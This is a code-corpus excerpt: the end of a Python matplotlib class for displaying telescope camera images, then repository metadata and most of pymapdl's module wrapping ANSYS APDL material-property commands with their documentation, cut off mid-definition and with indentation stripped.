self.pixel_highlighting.set_alpha(alpha)
self.pixel_highlighting.set_edgecolor(color)
self._update()
def enable_pixel_picker(self):
""" enable ability to click on pixels """
self.pixels.set_picker(True) # enable click
self.pixels.set_pickradius(
sqrt(u.Quantity(self.geom.pix_area[0]).value) / np.pi
)
self.pixels.set_snap(True) # snap cursor to pixel center
self.axes.figure.canvas.mpl_connect("pick_event", self._on_pick)
def set_limits_minmax(self, zmin, zmax):
""" set the color scale limits from min to max """
self.pixels.set_clim(zmin, zmax)
self.autoscale = False
self._update()
def set_limits_percent(self, percent=95):
""" auto-scale the color range to percent of maximum """
zmin = np.nanmin(self.pixels.get_array())
zmax = np.nanmax(self.pixels.get_array())
dz = zmax - zmin
frac = percent / 100.0
self.autoscale = False
self.set_limits_minmax(zmin, zmax - (1.0 - frac) * dz)
@property
def norm(self):
"""
The norm instance of the Display
Possible values:
- "lin": linear scale
- "log": log scale (cannot have negative values)
- "symlog": symmetric log scale (negative values are ok)
- any matplotlib.colors.Normalize instance, e. g. PowerNorm(gamma=-2)
"""
return self.pixels.norm
@norm.setter
def norm(self, norm):
if norm == "lin":
self.pixels.norm = Normalize()
elif norm == "log":
self.pixels.norm = LogNorm()
self.pixels.autoscale() # this is to handle matplotlib bug #5424
elif norm == "symlog":
self.pixels.norm = SymLogNorm(linthresh=1.0, base=10)
self.pixels.autoscale()
elif isinstance(norm, Normalize):
self.pixels.norm = norm
else:
raise ValueError(
"Unsupported norm: '{}', options are 'lin',"
"'log','symlog', or a matplotlib Normalize object".format(norm)
)
self.update(force=True)
self.pixels.autoscale()
@property
def cmap(self):
"""
Color map to use. Either a name or `matplotlib.colors.ColorMap`
instance, e.g. from `matplotlib.pyplot.cm`
"""
return self.pixels.get_cmap()
@cmap.setter
def cmap(self, cmap):
self.pixels.set_cmap(cmap)
self._update()
@property
def image(self):
"""The image displayed on the camera (1D array of pixel values)"""
return self.pixels.get_array()
@image.setter
def image(self, image):
"""
Change the image displayed on the Camera.
Parameters
----------
image: array_like
array of values corresponding to the pixels in the CameraGeometry.
"""
image = np.asanyarray(image)
if image.shape != self.geom.pix_x.shape:
raise ValueError(
(
"Image has a different shape {} than the " "given CameraGeometry {}"
).format(image.shape, self.geom.pix_x.shape)
)
self.pixels.set_array(np.ma.masked_invalid(image[self.mask]))
self.pixels.changed()
if self.autoscale:
self.pixels.autoscale()
self._update()
def _update(self, force=False):
""" signal a redraw if autoupdate is turned on """
if self.autoupdate:
self.update(force)
def update(self, force=False):
""" redraw the display now """
self.axes.figure.canvas.draw()
if self.colorbar is not None:
if force is True:
self.colorbar.update_bruteforce(self.pixels)
else:
self.colorbar.update_normal(self.pixels)
self.colorbar.draw_all()
def add_colorbar(self, **kwargs):
"""
add a colorbar to the camera plot
kwargs are passed to `figure.colorbar(self.pixels, **kwargs)`
See matplotlib documentation for the supported kwargs:
http://matplotlib.org/api/figure_api.html#matplotlib.figure.Figure.colorbar
"""
if self.colorbar is not None:
raise ValueError(
"There is already a colorbar attached to this CameraDisplay"
)
else:
if "ax" not in kwargs:
kwargs["ax"] = self.axes
self.colorbar = self.axes.figure.colorbar(self.pixels, **kwargs)
self.update()
def add_ellipse(self, centroid, length, width, angle, asymmetry=0.0, **kwargs):
"""
plot an ellipse on top of the camera
Parameters
----------
centroid: (float, float)
position of centroid
length: float
major axis
width: float
minor axis
angle: float
rotation angle wrt x-axis about the centroid, anticlockwise, in radians
asymmetry: float
3rd-order moment for directionality if known
kwargs:
any MatPlotLib style arguments to pass to the Ellipse patch
"""
ellipse = Ellipse(
xy=centroid,
width=length,
height=width,
angle=np.degrees(angle),
fill=False,
**kwargs,
)
self.axes.add_patch(ellipse)
self.update()
return ellipse
def overlay_moments(
self, hillas_parameters, with_label=True, keep_old=False, **kwargs
):
"""helper to overlay ellipse from a `HillasParametersContainer` structure
Parameters
----------
hillas_parameters: `HillasParametersContainer`
structuring containing Hillas-style parameterization
with_label: bool
If True, show coordinates of centroid and width and length
keep_old: bool
If True, to not remove old overlays
kwargs: key=value
any style keywords to pass to matplotlib (e.g. color='red'
or linewidth=6)
"""
if not keep_old:
self.clear_overlays()
# strip off any units
cen_x = u.Quantity(hillas_parameters.x).value
cen_y = u.Quantity(hillas_parameters.y).value
length = u.Quantity(hillas_parameters.length).value
width = u.Quantity(hillas_parameters.width).value
el = self.add_ellipse(
centroid=(cen_x, cen_y),
length=length * 2,
width=width * 2,
angle=hillas_parameters.psi.to_value("rad"),
**kwargs,
)
self._axes_overlays.append(el)
if with_label:
text = self.axes.text(
cen_x,
cen_y,
"({:.02f},{:.02f})\n[w={:.02f},l={:.02f}]".format(
hillas_parameters.x,
hillas_parameters.y,
hillas_parameters.width,
hillas_parameters.length,
),
color=el.get_edgecolor(),
)
self._axes_overlays.append(text)
def clear_overlays(self):
""" Remove added overlays from the axes """
while self._axes_overlays:
overlay = self._axes_overlays.pop()
overlay.remove()
def _on_pick(self, event):
""" handler for when a pixel is clicked """
pix_id = event.ind[-1]
xx, yy, aa = (
u.Quantity(self.geom.pix_x[pix_id]).value,
u.Quantity(self.geom.pix_y[pix_id]).value,
u.Quantity(np.array(self.geom.pix_area)[pix_id]),
)
if self.geom.pix_type.startswith("hex"):
self._active_pixel.xy = (xx, yy)
else:
rr = sqrt(aa)
self._active_pixel.xy = (xx - rr / 2.0, yy - rr / 2.0)
self._active_pixel.set_visible(True)
self._active_pixel_label.set_x(xx)
self._active_pixel_label.set_y(yy)
self._active_pixel_label.set_text(f"{pix_id:003d}")
self._active_pixel_label.set_visible(True)
self._update()
self.on_pixel_clicked(pix_id) # call user-function
def on_pixel_clicked(self, pix_id):
"""virtual function to overide in sub-classes to do something special
when a pixel is clicked
"""
print(f"Clicked pixel_id {pix_id}")
def show(self):
self.axes.figure.show()
def auto_set_axes_labels(self):
""" set the axes labels based on the Frame attribute"""
axes_labels = ("X", "Y")
if self.geom.frame is not None:
axes_labels = list(
self.geom.frame.get_representation_component_names().keys()
)
self.axes.set_xlabel(f"{axes_labels[0]} ({self.geom.pix_x.unit})")
self.axes.set_ylabel(f"{axes_labels[1]} ({self.geom.pix_y.unit})")
def add_frame_name(self, color="grey"):
""" label the frame type of the display (e.g. CameraFrame) """
frame_name = (
self.geom.frame.__class__.__name__
if self.geom.frame is not None
else "Unknown Frame"
)
self.axes.text( # position text relative to Axes
1.0,
0.0,
frame_name,
ha="right",
va="bottom",
transform=self.axes.transAxes,
color=color,
fontsize="smaller",
)
| 32.911417
| 88
| 0.585023
|
a1798eccb28095249bc0bb281c9cfb4dcdd40c60
| 38,269
|
py
|
Python
|
src/ansys/mapdl/core/_commands/preproc/materials.py
|
Miiicah/pymapdl
|
ce85393ca82db7556a5d05883ca3fd9296444cba
|
[
"MIT"
] | 1
|
2022-02-09T01:12:02.000Z
|
2022-02-09T01:12:02.000Z
|
src/ansys/mapdl/core/_commands/preproc/materials.py
|
Miiicah/pymapdl
|
ce85393ca82db7556a5d05883ca3fd9296444cba
|
[
"MIT"
] | 9
|
2022-02-24T20:34:18.000Z
|
2022-03-31T20:44:17.000Z
|
src/ansys/mapdl/core/_commands/preproc/materials.py
|
lynch1972/pymapdl
|
46b31438af2a0d5b2d9a69abe82e0fe69935a855
|
[
"MIT"
] | null | null | null |
"""
These PREP7 commands are used to define the linear material properties.
"""
class Materials:
def emunit(self, lab="", value="", **kwargs):
"""APDL Command: EMUNIT
Specifies the system of units for magnetic field problems.
Parameters
----------
lab
Label specifying the type of units:
MKS - Rationalized MKS system of units (meters, amperes,
henries, webers, etc.). Free-space permeability is
set to 4 πe-7 henries/meter. Free- space
permittivity is set to 8.85 e-12 F/m.
MUZRO - User defined system of units. Free-space
permeability is set to the value input for
VALUE. Other units must correspond to the
permeability units. Relative permeability may be
altered to absolute values.
EPZRO - User defined system of units. Free-space
permittivity is set to the value input for
VALUE. Other units must correspond to the
permittivity units.
value
User value of free-space permeability (defaults to 1) if Lab =
MUZRO, or free-space permittivity (defaults to 1) if Lab = EPZRO.
Notes
-----
Specifies the system of units to be used for electric and magnetic
field problems. The free-space permeability and permittivity values may
be set as desired. These values are used with the relative property
values [MP] to establish absolute property values.
Note:: : If the magnetic source field strength (Hs) has already been
calculated [BIOT], switching EMUNIT will not change the values.
For micro-electromechanical systems (MEMS), where dimensions are on the
order of microns, see the conversion factors in System of Units in the
Coupled-Field Analysis Guide.
This command is also valid in SOLUTION.
"""
command = "EMUNIT,%s,%s" % (str(lab), str(value))
return self.run(command, **kwargs)
def mp(self, lab="", mat="", c0="", c1="", c2="", c3="", c4="", **kwargs):
"""APDL Command: MP
Defines a linear material property as a constant or a function of
temperature.
Parameters
----------
lab
Valid material property label. Applicable labels are listed under
"Material Properties" in the input table for each element type in
the Element Reference. See Linear Material Properties in the
Material Reference for more complete property label definitions:
ALPD
Mass matrix multiplier for damping.
ALPX
Secant coefficients of thermal expansion (also ``ALPY``, ``ALPZ``).
BETD
Stiffness matrix multiplier for damping.
.. note:: If used in an explicit dynamic analysis, the value corresponds to the percentage of damping in the high
frequency domain. For example, 0.1 roughly corresponds to 10% damping in the high frequency domain.
BETX
Coefficient of diffusion expansion (also ``BETY``, ``BETZ``)
BVIS
Bulk viscosity
C
Specific heat
CREF
Reference concentration (may not be temperature dependent)
CSAT
Saturated concentration
CTEX
Instantaneous coefficients of thermal expansion (also ``CTEY``, ``CTEZ``)
CVH
Heat coefficient at constant volume per unit of mass
DENS
Mass density.
DMPR
Constant structural damping coefficient in full harmonic analysis or damping ratio in mode-superposition
analysis.
DXX
Diffusivity coefficients (also ``DYY``, ``DZZ``)
EMIS
Emissivity.
ENTH
Enthalpy.
EX
Elastic moduli (also ``EY``, ``EZ``)
GXY
Shear moduli (also ``GYZ``, ``GXZ``)
HF
Convection or film coefficient
KXX
Thermal conductivities (also ``KYY``, ``KZZ``)
LSST
Electric loss tangent
LSSM
Magnetic loss tangent
MGXX
Magnetic coercive forces (also ``MGYY``, ``MGZZ``)
MURX
Magnetic relative permeabilities (also ``MURY``, ``MURZ``)
MU
Coefficient of friction
NUXY
Minor Poisson's ratios (also ``NUYZ``, ``NUXZ``) (``NUXY`` = νyx, as described in Stress-Strain Relationships in the
Mechanical APDL Theory Reference)
PERX
Electric relative permittivities (also ``PERY``, ``PERZ``)
.. note:: If you enter permittivity values less than 1 for ``SOLID5``, ``PLANE13``, or ``SOLID98``, the program interprets
the values as absolute permittivity. Values input for ``PLANE223``, ``SOLID226``, or ``SOLID227`` are always interpreted as
relative permittivity.
PRXY
Major Poisson's ratios (also ``PRYZ``, ``PRXZ``) (``PRXY`` = νxy, as described in Stress-
Strain Relationships in the Mechanical APDL Theory
Reference)
QRATE
Heat generation rate for thermal mass element MASS71. Fraction of plastic work
converted to heat (Taylor-Quinney coefficient) for coupled-
field elements ``PLANE223``, ``SOLID226``, and ``SOLID227``.
REFT
Reference temperature. Must be defined as a constant; ``C1`` through ``C4`` are
ignored.
RH
Hall Coefficient.
RSVX
Electrical resistivities (also ``RSVY``, ``RSVZ``).
SBKX
Seebeck coefficients (also ``SBKY``, ``SBKZ``).
SONC
Sonic velocity.
THSX
Thermal strain (also ``THSY``, ``THSZ``).
VISC
Viscosity.
mat
Material reference number to be associated with the elements
(defaults to the current MAT setting [MAT]).
c0
Material property value, or if a property-versus-temperature
polynomial is being defined, the constant term in the polynomial.
``C0`` can also be a table name (``%tabname%``); if ``C0`` is a table name, ``C1``
through ``C4`` are ignored.
c1, c2, c3, c4
Coefficients of the linear, quadratic, cubic, and quartic terms,
respectively, in the property-versus-temperature polynomial. Leave
blank (or set to zero) for a constant material property.
Notes
-----
MP defines a linear material property as a constant or in terms of a
fourth order polynomial as a function of temperature. (See the TB
command for nonlinear material property input.) Linear material
properties typically require a single substep for solution, whereas
nonlinear material properties require multiple substeps; see Linear
Material Properties in the Material Reference for details.
If the constants ``C1`` - ``C4`` are input, the polynomial
.. math::
Property = C_0 + C_1(T) + C_2(T)^2 + C_3(T)^3 + C_4(T)^4
is evaluated at discrete temperature points with linear interpolation
between points (that is, a piecewise linear representation) and a
constant-valued extrapolation beyond the extreme points. First-order
properties use two discrete points (±9999°).
The :meth:`MPTEMP <ansys.mapdl.core.Mapdl.mptemp>` or
:meth:`MPTGEN <ansys.mapdl.core.Mapdl.mptgen>`
commands must be used for second and higher order properties to define
appropriate temperature steps. To ensure that the number of
temperatures defined via the :meth:`MPTEMP <ansys.mapdl.core.Mapdl.mptemp>`
and :meth:`MPTGEN <ansys.mapdl.core.Mapdl.mptgen>` commands is minimally
sufficient for a reasonable representation of the curve, ANSYS
generates an error message if the number is less than ``N``, and a warning
message if the number is less than ``2N``. The value ``N`` represents the
highest coefficient used; for example, if ``C3`` is nonzero and ``C4`` is zero,
a cubic curve is being used which is defined using 4 coefficients so
that ``N`` = 4.
"""
command = "MP,%s,%s,%s,%s,%s,%s,%s" % (
str(lab),
str(mat),
str(c0),
str(c1),
str(c2),
str(c3),
str(c4),
)
return self.run(command, **kwargs)
def mpamod(self, mat="", deftemp="", **kwargs):
"""APDL Command: MPAMOD
Modifies temperature-dependent secant coefficients of thermal
expansion.
Parameters
----------
mat
Material number for which the secant coefficients of thermal
expansion (SCTE's) are to be modified. Defaults to 1.
deftemp
Definition temperature at which the existing SCTE-versus-
temperature tables were defined. Defaults to zero.
Notes
-----
This command converts temperature-dependent SCTE data (properties ALPX,
ALPY, ALPZ) from the definition temperature (DEFTEMP) to the reference
temperature defined by MP,REFT or TREF. If both the MP,REFT and TREF
commands have been issued, the reference temperature defined by the
MP,REFT command will be used.
This command does not apply to the instantaneous coefficients of
thermal expansion (properties CTEX, CTEY, CTEZ) or to the thermal
strains (properties THSX, THSY, THSZ).
See Linear Material Properties in the Mechanical APDL Material
Reference and the Mechanical APDL Theory Reference for more details.
This command is also valid in SOLUTION.
"""
command = "MPAMOD,%s,%s" % (str(mat), str(deftemp))
return self.run(command, **kwargs)
def mpchg(self, mat="", elem="", **kwargs):
"""APDL Command: MPCHG
Changes the material number attribute of an element.
Parameters
----------
mat
Assign this material number to the element. Material numbers are
defined with the material property commands [MP].
elem
Element for material change. If ALL, change materials for all
selected elements [ESEL].
Notes
-----
Changes the material number of the specified element. Between load
steps in SOLUTION, material properties cannot be changed from linear to
nonlinear, or from one nonlinear option to another.
If you change from one MKIN model to another MKIN model, the different
MKIN models need to have the same number of data points. This
requirement also applies if you change from one KINH model to another
KINH model, or from one CHABOCHE model to another CHABOCHE model.
"""
command = "MPCHG,%s,%s" % (str(mat), str(elem))
return self.run(command, **kwargs)
def mpcopy(self, matf="", matt="", **kwargs):
"""APDL Command: MPCOPY
Copies linear material model data from one material reference number to
another.
Parameters
----------
matf
Material reference number from where material property data will be
copied.
matt
Material reference number to where material property data will be
copied.
Notes
-----
The MPCOPY command copies linear material properties only, which are
all properties defined through the MP command. If you copy a model that
includes both linear and yield behavior constants (for example, a BKIN
model), the MPCOPY and TBCOPY, ALL commands are used together to copy
the entire model. All input data associated with the model is copied,
that is, all data defined through the MP and TB commands.
Also, if you copy a material model using the Material Model Interface
(Edit> Copy), both the commands MPCOPY and TBCOPY, ALL are issued,
regardless of whether the model includes linear constants only, or if
it includes a combination of linear and yield behavior constants.
This command is also valid in SOLUTION.
"""
command = "MPCOPY,%s,%s" % (str(matf), str(matt))
return self.run(command, **kwargs)
def mpdata(
self,
lab="",
mat="",
sloc="",
c1="",
c2="",
c3="",
c4="",
c5="",
c6="",
**kwargs,
):
"""APDL Command: MPDATA
Defines property data to be associated with the temperature table.
Parameters
----------
lab
Valid property label. Applicable labels are listed under "Material
Properties" in the input table for each element type in the Element
Reference. See Linear Material Properties in the Mechanical APDL
Material Reference for more complete property label definitions:
ALPD - Mass matrix multiplier for damping.
ALPX - Secant coefficients of thermal expansion (also ALPY, ALPZ). (See also MPAMOD
command for adjustment to reference temperature).
BETD - Stiffness matrix multiplier for damping.
BETX - Coefficient of diffusion expansion (also BETY, BETZ)
C - Specific heat.
CREF - Reference concentration (may not be temperature dependent)
CSAT - Saturated concentration
CTEX - Instantaneous coefficients of thermal expansion (also CTEY, CTEZ).
DENS - Mass density.
DMPR - Constant material damping coefficient.
DXX - Diffusivity coefficients (also DYY, DZZ)
EMIS - Emissivity.
ENTH - Enthalpy.
EX - Elastic moduli (also EY, EZ).
GXY - Shear moduli (also GYZ, GXZ).
HF - Convection or film coefficient.
KXX - Thermal conductivities (also KYY, KZZ).
LSST - Dielectric loss tangent.
MGXX - Magnetic coercive forces (also MGYY, MGZZ).
MU - Coefficient of friction.
MURX - Magnetic relative permeabilities (also MURY, MURZ).
NUXY - Minor Poisson's ratios (also NUYZ, NUXZ).
PERX - Electric relative permittivities (also PERY, PERZ).
PRXY - Major Poisson's ratios (also PRYZ, PRXZ).
QRATE - Heat generation rate.
REFT - Reference temperature (may not be temperature dependent).
RH - Hall Coefficient.
RSVX - Electrical resistivities (also RSVY, RSVZ).
SBKX - Seebeck coefficients (also SBKY, SBKZ).
SONC - Sonic velocity.
THSX - Thermal strain (also THSY, THSZ).
VISC - Viscosity.
mat
Material reference number to be associated with the elements
(defaults to 1 if you specify zero or no material number).
sloc
Starting location in table for generating data. For example, if
SLOC = 1, data input in the C1 field is the first constant in the
table. If SLOC = 7, data input in the C1 field is the seventh
constant in the table, etc. Defaults to the last location filled +
1.
c1, c2, c3, . . . , c6
Property data values assigned to six locations starting with SLOC.
If a value is already in this location, it is redefined. A blank
(or zero) value for C1 resets the previous value in SLOC to zero.
A value of zero can only be assigned by C1. Blank (or zero) values
for C2 to C6 leave the corresponding previous values unchanged.
Notes
-----
Defines a table of property data to be associated with the temperature
table. Repeat MPDATA command for additional values (100 maximum).
Temperatures must be defined first [MPTEMP]. Also stores assembled
property function table (temperature and data) in virtual space.
This command is also valid in SOLUTION.
Without Emag enabled, the ``MURx`` and ``MGxx`` properties are
not allowed. In ANSYS Professional, all structural and
thermal properties are allowed except ALPD, BETD, and MU. In
ANSYS Emag, only the ``RSVx``, ``PERx``, ``MURx``, and ``MGxx``
properties are allowed. Only products that include ANSYS Emag
can use the LSST property. The ``SBKx`` property is only available
in ANSYS Multiphysics and ANSYS PrepPost.
"""
command = "MPDATA,%s,%s,%s,%s,%s,%s,%s,%s,%s" % (
str(lab),
str(mat),
str(sloc),
str(c1),
str(c2),
str(c3),
str(c4),
str(c5),
str(c6),
)
return self.run(command, **kwargs)
def mpdele(self, lab="", mat1="", mat2="", inc="", lchk="", **kwargs):
"""APDL Command: MPDELE
Deletes linear material properties.
Parameters
----------
lab
Material property label (see MP command for valid labels). If ALL,
delete properties for all applicable labels.
mat1, mat2, inc
Delete materials from MAT1 to MAT2 (defaults to MAT1) in steps of
INC (defaults to 1). If MAT1 = ALL, MAT2 and INC are ignored and
the properties for all materials are deleted.
lchk
Specifies the level of element-associativity checking:
NOCHECK - No element-associativity check occurs. This option is the default.
WARN - When a section, material, or real constant is associated with an element, ANSYS
issues a message warning that the necessary entity has been
deleted.
CHECK - The command terminates, and no section, material, or real constant is deleted
if it is associated with an element.
Notes
-----
This command is also valid in SOLUTION.
The LCHK argument is valid only when Lab = ALL.
"""
command = "MPDELE,%s,%s,%s,%s,%s" % (
str(lab),
str(mat1),
str(mat2),
str(inc),
str(lchk),
)
return self.run(command, **kwargs)
def mpdres(self, labf="", matf="", labt="", matt="", **kwargs):
"""APDL Command: MPDRES
Reassembles existing material data with the temperature table.
Parameters
----------
labf
Material property label associated with MATF.
matf
Material reference number of property to restore from virtual
space.
labt
Material property label associated with MATT (defaults to label
associated with MATF).
matt
Material reference number assigned to generated property (defaults
to MATF).
Notes
-----
Restores into the database (from virtual space) a data table previously
defined [MP] for a particular property, assembles data with current
database temperature table, and stores back in virtual space as a new
property.
This command is also valid in SOLUTION.
"""
command = "MPDRES,%s,%s,%s,%s" % (str(labf), str(matf), str(labt), str(matt))
return self.run(command, **kwargs)
def mplib(self, r_w_opt="", path="", **kwargs):
"""APDL Command: /MPLIB
Sets the default material library read and write paths.
Parameters
----------
r-w_opt
Determines what path is being set. Possible values are:
READ - Set the read path.
WRITE - Set the write path.
STAT - Report what read and write paths are currently in use.
path
The directory path to be used for material library files.
Notes
-----
The /MPLIB command sets two path strings used in conjunction with the
material library feature and the MPREAD and MPWRITE commands.
For MPREAD, when you use the LIB option and no directory path is given
in the file name, the command searches for the file in these locations:
the current working directory, the user's home directory, the user-
specified material library directory (as defined by the
/MPLIB,READ,PATH command), and /ansys_dir/matlib.
For MPWRITE, when you use the LIB option and the directory portion of
the specification for the material library file is blank, the command
writes the material library file to the directory specified by the
/MPLIB,WRITE,PATH command (if that path has been set). If the path has
not been set, the default is to write the file to the current working
directory.
The Material Library files supplied with the distribution disks are
meant for demonstration purposes only. These files are not intended
for use in customer applications.
"""
command = "/MPLIB,%s,%s" % (str(r_w_opt), str(path))
return self.run(command, **kwargs)
def mplist(self, mat1="", mat2="", inc="", lab="", tevl="", **kwargs):
"""APDL Command: MPLIST
Lists linear material properties.
Parameters
----------
mat1, mat2, inc
List materials from MAT1 to MAT2 (defaults to MAT1) in steps of INC
(defaults to 1). If MAT1= ALL (default), MAT2 and INC are ignored
and properties for all material numbers are listed.
lab
Material property label (see the MP command for labels). If ALL
(or blank), list properties for all labels. If EVLT, list
properties for all labels evaluated at TEVL.
tevl
Evaluation temperature for Lab = EVLT listing (defaults to BFUNIF).
Notes
-----
For Lab = EVLT, when the property is from tables, the MPPLOT command
will not be valid because the property could be a function of more than
temperature.
This command is valid in any processor.
"""
command = "MPLIST,%s,%s,%s,%s,%s" % (
str(mat1),
str(mat2),
str(inc),
str(lab),
str(tevl),
)
return self.run(command, **kwargs)
def mpplot(self, lab="", mat="", tmin="", tmax="", pmin="", pmax="", **kwargs):
"""APDL Command: MPPLOT
Plots linear material properties as a function of temperature.
Parameters
----------
lab
Linear material property label (EX, EY, etc.) [MP].
mat
Material reference number. Defaults to 1.
tmin
Minimum abscissa value to be displayed.
tmax
Maximum abscissa value.
pmin
Minimum property (ordinate) value to be displayed.
pmax
Maximum property value.
Notes
-----
When the property is from tables, the MPPLOT command will not be valid
because the property could be a function of more than temperature.
This command is valid in any processor.
"""
command = "MPPLOT,%s,%s,%s,%s,%s,%s" % (
str(lab),
str(mat),
str(tmin),
str(tmax),
str(pmin),
str(pmax),
)
return self.run(command, **kwargs)
def mpread(self, fname="", ext="", lib="", **kwargs):
"""APDL Command: MPREAD
Reads a file containing material properties.
Parameters
----------
fname
File name and directory path (248 characters maximum,
including directory). If you do not specify the ``LIB``
option, the default directory is the current working
directory. If you specify the ``LIB`` option, the default is
the following search path: the current working directory,
the user's home directory, ``MPLIB_DIR`` (as specified by the
``/MPLIB,READ,PATH`` command) and ``/ansys_dir/matlib`` (as
defined by installation). If you use the default for your
directory, you can use all 248 characters for the file
name.
ext
Filename extension (eight-character maximum).
lib
Reads material library files previously written with the
MPWRITE command. (See the description of the ``LIB`` option
for the ``MPWRITE`` command.) The only allowed value for ``LIB``
is ``LIB``.
Notes
-----
Material properties written to a file without the ``LIB`` option
do not support nonlinear properties. Also, properties written
to a file without the ``LIB`` option are restored in the same
material number as originally defined. To avoid errors, use
``MPREAD`` with the ``LIB`` option only when reading files written
using MPWRITE with the ``LIB`` option.
If you omit the ``LIB`` option for ``MPREAD``, this command supports
only linear properties.
Material numbers are hardcoded. If you write a material file
without specifying the ``LIB`` option, then read that file in
using the ``MPREAD`` command with the ``LIB`` option, the ANSYS
program will not write the file to a new material number.
Instead, it will write the file to the "old" material number
(the number specified on the MPWRITE command that created the
file.)
This command is also valid in SOLUTION.
"""
return self.run(f"MPREAD,{fname},{ext},,{lib}", **kwargs)
def mptemp(self, sloc="", t1="", t2="", t3="", t4="", t5="", t6="", **kwargs):
"""APDL Command: MPTEMP
Defines a temperature table for material properties.
Parameters
----------
sloc
Starting location in table for entering temperatures. For example,
if SLOC = 1, data input in the T1 field applies to the first
constant in the table. If SLOC = 7, data input in the T1 field
applies to the seventh constant in the table, etc. Defaults to the
last location filled + 1.
t1, t2, t3, . . . , t6
Temperatures assigned to six locations starting with SLOC. If a
value is already in this location, it will be redefined. A blank
(or zero) value for T1 resets the previous value in SLOC to zero.
A value of zero can only be assigned by T1. Blank (or zero) values
for T2 to T6 leave the corresponding previous values unchanged.
Notes
-----
Defines a temperature table to be associated with the property data
table [MPDATA]. These temperatures are also used for polynomial
property evaluation, if defined [MP]. Temperatures must be defined in
non-descending order. Issue MATER $ STAT to list the current
temperature table. Repeat MPTEMP command for additional temperatures
(100 maximum). If all arguments are blank, the temperature table is
erased.
For clear definition, the temperature range you define with the MPTEMP
command should include the entire range you'll use in subsequently
defined materials. To assist the user in this, the first (and only the
first) excursion out of the temperature range defined by the MPTEMP
commands is flagged with a warning message. Similarly, the reference
temperature (TREF or MP,reft commands) should also fall in this same
temperature range. If not and MP,alpx was used, a note will be output.
If not, and MP,ctex or MP,thsx was used, an error message will be
output.
This command is also valid in SOLUTION.
"""
command = "MPTEMP,%s,%s,%s,%s,%s,%s,%s" % (
str(sloc),
str(t1),
str(t2),
str(t3),
str(t4),
str(t5),
str(t6),
)
return self.run(command, **kwargs)
def mptgen(self, stloc="", num="", tstrt="", tinc="", **kwargs):
"""APDL Command: MPTGEN
Adds temperatures to the temperature table by generation.
Parameters
----------
stloc
Starting location in table for generating temperatures. Defaults
to last location filled + 1.
num
Number of temperatures to be generated (1-100).
tstrt
Temperature assigned to STLOC location.
tinc
Increment previous temperature by TINC and assign to next location
until all NUM locations are filled.
Notes
-----
Adds temperatures to the temperature table by generation. May be used
in combination (or in place of) the MPTEMP command.
This command is also valid in SOLUTION.
"""
command = "MPTGEN,%s,%s,%s,%s" % (str(stloc), str(num), str(tstrt), str(tinc))
return self.run(command, **kwargs)
def mptres(self, lab="", mat="", **kwargs):
"""APDL Command: MPTRES
Restores a temperature table previously defined.
Parameters
----------
lab
Material property label [MP].
mat
Material reference number.
Notes
-----
Restores into the database (from virtual space) a temperature table
previously defined [MP] for a particular property. The existing
temperature table in the database is erased before this operation.
This command is also valid in SOLUTION.
"""
command = "MPTRES,%s,%s" % (str(lab), str(mat))
return self.run(command, **kwargs)
def mpwrite(self, fname="", ext="", lib="", mat="", **kwargs):
"""APDL Command: MPWRITE
Writes linear material properties in the database to a file
(if the LIB option is not specified) or writes both linear and
nonlinear material properties (if LIB is specified) from the
database to a file.
Parameters
----------
fname
File name and directory path (248 characters maximum, including
directory). If you do not specify the ``LIB`` option, the default
directory is the current working directory. If you specify ``LIB`` and
you have specified a material library directory (via the ``/MPLIB``
command), that directory is the default. Otherwise, the default is
the current working directory. If you use the default for your
directory, you can use all 248 characters for the file name.
The file name defaults to Jobname.
ext
Filename extension (eight-character maximum).
If you omit the ``LIB`` option, the default extension is
MP. If you specify the ``LIB`` option, the default extension
is units_MPL, where units is the system of units currently
in use. (See the description of the ``/UNITS`` command.) For
example, if ``/UNITS`` is set to BIN, the extension defaults
to BIN_MPL.
lib
The only value allowed for this field is the string ``"LIB"``.
The ``LIB`` option indicates that you wish to have properties
associated with the material (``MAT``) written to the
specified material library file using the material library
file format. The material library file format is
ASCII-text-based ANSYS command input. Certain commands
associated with this format have been modified to
interpret the string "_MATL" to mean the currently
selected material. This feature makes the material library
file independent of the material number in effect when the
file was written; this enables you to restore the
properties into the ANSYS database using the material
number of your choice. The ``LIB`` option also enables you to
save both linear and nonlinear properties. If you omit the
``LIB`` option, you can save linear properties only.
mat
Specifies the material to be written to the named material library
file. There is no default; you must either specify a material or
omit the ``MAT`` argument. Even if you specify a ``MAT`` value, the ANSYS
program ignores it if the ``LIB`` argument is not specified.
Notes
-----
Writes linear material properties currently in the database to a file.
The file is rewound before and after writing.
This command is also valid in SOLUTION.
"""
return self.run(f"MPWRITE,{fname},{ext},,{lib},{mat}", **kwargs)
def tbft(
self,
oper="",
id_="",
option1="",
option2="",
option3="",
option4="",
option5="",
option6="",
option7="",
**kwargs,
):
"""APDL Command: TBFT
Performs material curve-fitting operations.
Parameters
----------
oper
The specific curve-fitting operation:
Define a constitutive model. - Delete a constitutive model.
Write data related to a constitutive model to the database (same as TB command). - Initialize coefficients of a constitutive model for nonlinear curve-fitting
procedure.
Deletes coefficients at current reference temperature. Applicable only for temperature dependent coefficients. - Solve for coefficients.
Fix (hold constant) the coefficient you specify in Option4. - Add experimental data.
Delete experimental data. - List all data associated with the material model represented by the material ID
number.
id_
The material reference number (same as MAT argument used in the TB
command). Valid entry is any number greater than zero (default = 1)
but less than 100,000.
option1
For curve-fit function operations (Oper = FADD, FDEL, FSET, SET,
CDEL, SOLVE or FIX) this field specifies the category (HYPER).
option2
For curve-fit function operations (Oper = FADD, FDEL, FSET, SET,
CDEL, SOLVE, or FIX), this field specifies constitutive model type.
The valid entries are listed in Table 231: Hyperelastic Options
below.
option3
For Oper = FADD, FDEL, FSET, CDEL, SET, SOLVE or FIX, some of the
cases specified in Option2 will require that the polynomial order
be specified. The applicable values for the order specification are
listed in Table 231: Hyperelastic Options.
option4
When you are working on a specific coefficient (Oper = FIX), this
field specifies the index of that coefficient. Valid entries vary
from 1 to n, where n is the total number of coefficients (default =
1).
option5
When you are working on a specific coefficient (Oper = FIX), this
field specifies the index of that coefficient. Valid entries vary
from 1 to N, where N is the total number of coefficients (default =
1)
option6
If Oper = SOLVE, specifies the allowed tolerance in residual change
to stop an iteration. Valid entry is 0.0 to 1.0 (default = 0.0).
option7
If Oper = SOLVE, specifies the allowed tolerance in coefficient
change to stop an iteration. Valid entry is 0 to 1 (default = 0).
"""
command = "TBFT,%s,%s,%s,%s,%s,%s,%s,%s,%s" % (
str(oper),
str(id_),
str(option1),
str(option2),
str(option3),
str(option4),
str(option5),
str(option6),
str(option7),
)
return self.run(command, **kwargs)
def uimp(
